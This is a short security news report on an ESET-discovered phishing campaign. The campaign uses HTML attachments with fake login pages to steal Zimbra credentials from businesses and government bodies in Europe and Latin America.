A phishing campaign designed to collect Zimbra user credentials was uncovered by ESET. Zimbra Collaboration is an open-core collaborative software platform. The campaign has been active since at least April 2023 and is still ongoing.

The campaign’s targets are a variety of small and medium businesses and governmental entities. According to researchers, the largest number of targets are located in Poland; however, victims in other European countries such as Ukraine, Italy, France and the Netherlands are also targeted. Latin American nations were hit too; Ecuador tops the list of detections in that region.

Initially, the target receives an email with a phishing page in the attached HTML file. The email warns the target about an email server update, account deactivation or similar issue and directs the user to click on the attached file. After opening the attachment, the user is presented with a fake Zimbra login page customized according to the targeted organization.

In the background, the submitted credentials are collected from the HTML form and sent to a server controlled by the adversary. Then, the attacker is potentially able to infiltrate the affected email account. It is likely that the attackers were able to compromise the victim’s administrator accounts and created new mailboxes that were then used to send phishing emails to other targets.